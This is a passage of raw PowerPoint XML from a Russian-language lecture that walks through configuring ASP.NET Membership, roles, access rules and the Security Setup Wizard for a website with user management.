              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t> Ниже показаны обе эти возможности.</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274638"/>
            <a:ext cx="8229600" cy="850900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="3600" smtClean="0"/>
              <a:t>Создание </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" smtClean="0"/>
              <a:t>web-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3600" smtClean="0"/>
              <a:t>сайта с управлением пользователями</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109571" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395288" y="1341438"/>
            <a:ext cx="8569325" cy="5516562"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Создайте структуру </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>сайта</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Если часть вашего </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>сайта требует аутентификации или членства в специальной роли</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>то поместите страницы, которые должны быть защищены в отдельную папку</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Если аутентификация не обязательная </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>например, форум пользователей, в котором не зарегистрированный пользователь может просматривать сообщения, но не может добавлять новые</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>отдельная папка не требуется</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Сконфигурируйте </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>ASP.NET Membership.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Создайте роли, которые соответствуют группам пользователей</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Можно создать пользователей и добавить их к требуемым ролям</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Создайте правила доступа для управления тем, к каким папкам пользователи и роли имеют доступ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Задать параметры протокола</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> Simple Mail Transport Protocol (SMTP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>для выполнения оповещения по почте и восстановления паспорта</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Это можно сделать из панели </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Web Site Administration Tool.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Создать страницу подключения используя </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Visual Studio.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2000" smtClean="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274638"/>
            <a:ext cx="8229600" cy="922337"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
              <a:t>Использование Membership API</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110595" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1341438"/>
            <a:ext cx="8229600" cy="5256212"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Прежде чем использовать ASP.NET membership API и ЭУ по безопасности нужно выполнить следующие действия:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" smtClean="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Сконфигурировать forms аутентификацию</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>в файле web.config и отказать в доступе анонимным пользователям.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" smtClean="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Задать хранилище для membership данных. Например, если используется SQL Server, то нужно создать пару таблиц и хранимые процедуры БД SQL Server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" smtClean="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Сконфигурировать используемые</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>строку соединения и провайдера membership, в конфигурационном файле приложения web.config.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" smtClean="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Создать пользователей в хранилище membership используя конфигурационную web утилиту или используя собственную страницу администрирования, которую можно создать в своем приложении с помощью membership API functions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" smtClean="0"/>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Создать страницу подключения (login page), которая использует имеющиеся Login ЭУ или создать login page, которая использует класс Membership для проверки введенных пользователем данных и аутентификации пользователей.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Можно выполнить все эти действия (кроме конфигурирования провайдера) с помощью</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> ASP.NET WAT, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>который включает мастер безопасности (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>security wizard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Нужно выбрать</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>команду</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Web Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>&gt; ASP.NET Configuration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Visual Studio.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1800" smtClean="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274638"/>
            <a:ext cx="8229600" cy="633412"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
              <a:t>Конфигурирование </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" smtClean="0"/>
              <a:t>ASP.NET Membership</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3200" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111619" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323850" y="1125538"/>
            <a:ext cx="8362950" cy="5399087"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Создайте </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>ASP.NET Web application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>используя</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> Visual Studio. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Если планируется иметь отдельные папки для различных групп</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>например, папку к которой имеется доступ только у аутентифицированных пользователей</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>или папку для страниц администратора приложения</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>то создайте вначале эти папки</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>В разделе меню </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Website</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t> выберите команду </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>“ASP.NET Configuration”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Выберите панель (или ссылку) «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>» (Безопасность)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>и нажмите «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Use The Security Setup Wizard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>» (Использовать мастер настройки безопасности …)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>для пошагового конфигурирования аутентификации и авторизации</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>На первом шаге 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>нажмите </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Next.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>На шаге </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>2, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>выберите</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>«</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>From The Internet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>» (через Интернет)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>для использования </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>ASP.NET membership (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>как показано на следующем слайде</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>или выберите</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>«</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>From A Local Area Network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>» (По локальной сети)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>для использования </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>аутентификации</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t> Нажмите </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Next.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>На шаге </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>3, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>мастер покажет сообщение о том, что информация пользователей будет сохраняться с использованием </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Advanced Provider Settings. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>По умолчанию информация о членстве хранится в файле базы данных </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Microsoft SQL 2005 Server Express Edition </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>в папке </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>App_Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>создаваемого </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>сайта</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Нажмите</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> Next.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274638"/>
            <a:ext cx="8229600" cy="561975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
              <a:t>Конфигурирование </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" smtClean="0"/>
              <a:t>ASP.NET Membership</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
              <a:t> (продолжение)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112643" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323850" y="1268413"/>
            <a:ext cx="8507413" cy="5589587"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>7.   На шаге </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>4, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>мастер спросит о создании ролей</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
